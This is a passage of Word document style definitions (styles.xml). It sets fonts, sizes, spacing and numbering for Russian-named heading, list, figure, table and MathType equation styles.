      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bodytext2">
    <w:name w:val="bodytext2"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="bodytextindent3">
    <w:name w:val="bodytextindent3"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="1140"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="14"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="71">
    <w:name w:val="7"/>
    <w:aliases w:val="Колонтитул + Microsoft Sans Serif,5 pt"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="6"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="15"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="13"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="12"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="111">
    <w:name w:val="11"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="100">
    <w:name w:val="10"/>
    <w:aliases w:val="Основной текст (13) + Times New Roman,5 pt3,Не курсив,Интервал 0 pt2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="9">
    <w:name w:val="9"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="82">
    <w:name w:val="8"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="51">
    <w:name w:val="5"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="41">
    <w:name w:val="4"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="34">
    <w:name w:val="3"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="2"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="1"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a00">
    <w:name w:val="a0"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="msoins0">
    <w:name w:val="msoins"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="afb">
    <w:name w:val="page number"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="17">
    <w:name w:val="Рисунок1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="120" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="18">
    <w:name w:val="Подрисуночная подпись1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyTextIndent1">
    <w:name w:val="Body Text Indent1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:ind w:left="435" w:firstLine="285"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="19">
    <w:name w:val="Список1"/>
    <w:basedOn w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afc">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="afd"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afd">
    <w:name w:val="Текст Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="afc"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="afe">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C123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Стиль1"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="700"/>
        <w:tab w:val="left" w:pos="1120"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="1b">
    <w:name w:val="Table Grid 1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>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MTDisplayEquation">
    <w:name w:val="MTDisplayEquation"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MTEquationSection">
    <w:name w:val="MTEquationSection"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:vanish/>
      <w:color w:val="FF0000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="aff">
    <w:name w:val="Table Professional"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>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t-----3">
    <w:name w:val="Mt-Сп-Нумерованный-В-Ур-3"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="76"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="1985"/>
      </w:tabs>
      <w:ind w:left="1134" w:firstLine="426"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="27"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="Основной текст 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="26"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--1">
    <w:name w:val="Mt-Название-работы"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:pageBreakBefore/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt----2">
    <w:name w:val="Mt-Сп-Маркированный-Ур-2"/>
    <w:next w:val="Mt--2"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="77"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1560"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="709" w:firstLine="425"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--00">
    <w:name w:val="Mt-Заголовок-0"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="360" w:after="360" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt-">
    <w:name w:val="Mt-Рисунок"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--3">
    <w:name w:val="Mt-Рисунок-Подпись"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:contextualSpacing/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:noProof/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Mt-0">
    <w:name w:val="Mt-Формула"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstCol">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:tblPr/>
      <w:tcPr>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastCol">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:tblPr/>
      <w:tcPr>
        <w:vAlign w:val="center"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--10">
    <w:name w:val="Mt-Заголовок-1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="120" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--4">
    <w:name w:val="Mt-Таблица-Надпись"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="567"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--0">
    <w:name w:val="Mt-Сп-Нумерованный"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="79"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--">
    <w:name w:val="Mt-Сп-Маркированный"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="75"/>
      </w:numPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Mt-1">
    <w:name w:val="Mt-Таблица"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>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lastRow">
      <w:pPr>
        <w:wordWrap/>
        <w:spacing w:afterLines="0" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--5">
    <w:name w:val="Mt-Таблица-Послестрока"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="12"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--20">
    <w:name w:val="Mt-Заголовок-2"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="709"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--1b">
    <w:name w:val="Mt-Заголовок-1b"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt-2">
    <w:name w:val="Mt-Где"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--6">
    <w:name w:val="Mt-Формула-Номер"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--7">
    <w:name w:val="Mt-Таблица-Текст"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--8">
    <w:name w:val="Mt-Формула-Формула"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt--2">
    <w:name w:val="Mt-Текст-Обычный"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt----3">
    <w:name w:val="Mt-Сп-Маркированный-Ур-3"/>
    <w:next w:val="Mt--2"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="78"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2127"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="1418" w:firstLine="284"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Mt---B--2">
    <w:name w:val="Mt-Сп-Нумерованный-B-Ур-2"/>
    <w:next w:val="Mt--2"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1560"/>
      </w:tabs>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="709" w:firstLine="425"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
